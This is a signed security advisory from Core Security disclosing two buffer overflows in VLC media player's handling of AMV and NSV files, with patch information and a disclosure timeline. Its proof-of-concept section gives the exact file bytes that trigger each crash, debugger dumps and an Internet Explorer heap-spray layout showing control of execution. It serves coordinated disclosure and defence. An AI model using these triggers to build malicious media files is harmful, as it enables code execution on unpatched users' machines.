-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
VLC Vulnerabilities handling .AMV and .NSV files
1. *Advisory Information*
Title: VLC Vulnerabilities handling .AMV and .NSV files
Advisory ID: CORE-2011-0208
Advisory URL:
http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
Date published: 2011-03-23
Date of last update: 2011-03-23
Vendors contacted: VLC team
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3275, CVE-2010-3276
3. *Vulnerability Description*
Two vulnerabilities have been found in VLC media player [1], when
handling .AMV and .NSV file formats. These vulnerabilities can be
exploited by a remote attacker to obtain arbitrary code execution with
the privileges of the user running VLC.
4. *Vulnerable packages*
. VLC 1.1.4
. VLC 1.1.5
. VLC 1.1.6
. VLC 1.1.7
. Older versions may be affected, but were not checked.
5. *Non-vulnerable packages*
. VLC 1.1.8
6. *Vendor Information, Solutions and Workarounds*
These vulnerabilities are fixed in VLC version 1.1.8, which can be
downloaded from http://www.videolan.org/
7. *Credits*
These vulnerabilities were discovered and researched by Ricardo Narvaja
from Core Security Technologies. Publication was coordinated by Carlos
Sarraute.
8. *Technical Description / Proof of Concept Code*
8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files
[CVE-2010-3275]*
This vulnerability was found by fuzzing different formats. In AMV files
if the offset 0x41 is changed to a value greater than 90 as shown below:
/-----
Offset(h)
00000000 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFF....AMV LIST
00000010 00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 ....hdrlamvh8...
00000020 24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $..............
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 A0 A0
- -----/
Then the program will crash in the following plugin:
/-----
Executable modules, item 248
Base=6D680000
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
Name=libdir_1
Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
- -----/
More precisely in this location:
/-----
6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX
6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
offset
000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
000006A7 890424 MOV DWORD PTR SS:[ESP],EAX
000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
registers
EAX 3DD1255C
ECX 00000000
EDX 3032344A
EBX 3DDF9410
ESP 3F82FC04
EBP 3DD1229C
ESI 3DD1255C
EDI 3DDF90BC
EIP 6D6812AA libdir_1.6D6812AA
- -----/
When executing an appropriate heap spray in Internet explorer:
/-----
303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
- -----/
We manage to take control of the execution flow and execute our code:
/-----
0C0C0C0C 0C 0C OR AL,0C
0C0C0C0E 0C 0C OR AL,0C
0C0C0C10 0C 0C OR AL,0C
0C0C0C12 0C 0C OR AL,0C
0C0C0C14 0C 0C OR AL,0C
0C0C0C16 0C 0C OR AL,0C
0C0C0C18 0C 0C OR AL,0C
0C0C0C1A 0C 0C OR AL,0C
0C0C0C1C 0C 0C OR AL,0C
0C0C0C1E 0C 0C OR AL,0C
0C0C0C20 0C 0C OR AL,0C
0C0C0C22 0C 0C OR AL,0C
0C0C0C24 0C 0C OR AL,0C
0C0C0C26 0C 0C OR AL,0C
- -----/
8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files
[CVE-2010-3276]*
In NSV files when changing the offsets 0x0b to 0x0e as shown below:
/-----
Offset(h)
00000000 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3_._..
- -----/
We can make the program crash in the following plugin:
/-----
Executable modules, item 248
Base=6D680000
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
Name=libdir_1
Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll
- -----/
More precisely in this location:
/-----
6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX
6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
offset
000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX]
000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX
000006A7 890424 MOV DWORD PTR SS:[ESP],EAX
000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80]
registers
EAX 37CE12FC ASCII "I420"
ECX 00000000
EDX 30323449
EBX 37D8F268
ESP 3865FC04
EBP 37CE103C
ESI 37CE12FC ASCII "I420"
EDI 37D8E314
EIP 6D6812AA libdirec.6D6812AA
- -----/
When executing an appropriate heap spray in Internet explorer:
/-----
303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................
- -----/
We make the execution continue in our code:
/-----
0C0C0C0C 0C 0C OR AL,0C
0C0C0C0E 0C 0C OR AL,0C
0C0C0C10 0C 0C OR AL,0C
0C0C0C12 0C 0C OR AL,0C
0C0C0C14 0C 0C OR AL,0C
0C0C0C16 0C 0C OR AL,0C
0C0C0C18 0C 0C OR AL,0C
0C0C0C1A 0C 0C OR AL,0C
0C0C0C1C 0C 0C OR AL,0C
0C0C0C1E 0C 0C OR AL,0C
0C0C0C20 0C 0C OR AL,0C
0C0C0C22 0C 0C OR AL,0C
0C0C0C24 0C 0C OR AL,0C
0C0C0C26 0C 0C OR AL,0C
- -----/
9. *Report Timeline*
. 2011-02-08:
Core Security Technologies notifies the VLC team of the vulnerabilities.
Publication date is temporarily set to February 28, 2011.
. 2011-02-08:
VLC team acknowledges notification and provides PGP keys.
. 2011-02-09:
Core sends a technical description and PoC files that trigger the
vulnerabilities.
. 2011-02-18:
Core asks the VLC team whether they could reproduce the vulnerabilities.
. 2011-02-23:
VLC team replies that fixes will be included in VLC 1.1.8, and that they
believe the issue is not exploitable.
. 2011-02-25:
Core replies that the issues have been confirmed to be exploitable, and
that the researcher has developed fully working exploits. Core offers to
reschedule the publication of its advisory to coordinate it with the
release of fixes.
. 2011-03-10:
Core requests an update on this issue, since no reply was received. Core
notes that the PoC files and exploits were tested on Windows only, and
reschedules publication to March 16, stating that the advisory will be
published as "user release" if no reply is received.
. 2011-03-10:
VLC team requests two additional weeks for the release of fixes, and
asks whether the vulnerabilities are exploitable with ASLR.
. 2011-03-14:
Core agrees to postpone publication, confirms that the bugs are
exploitable with ASLR, and requests a concrete date for the release.
. 2011-03-16:
VLC team states that they would like to release on March 23rd.
. 2011-03-18:
Core agrees with the release date.
. 2011-03-23:
Advisory CORE-2011-0208 is published.
10. *References*
[1] VLC media player http://www.videolan.org/
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.a
sc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA
wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9
=oV7u
-----END PGP SIGNATURE-----
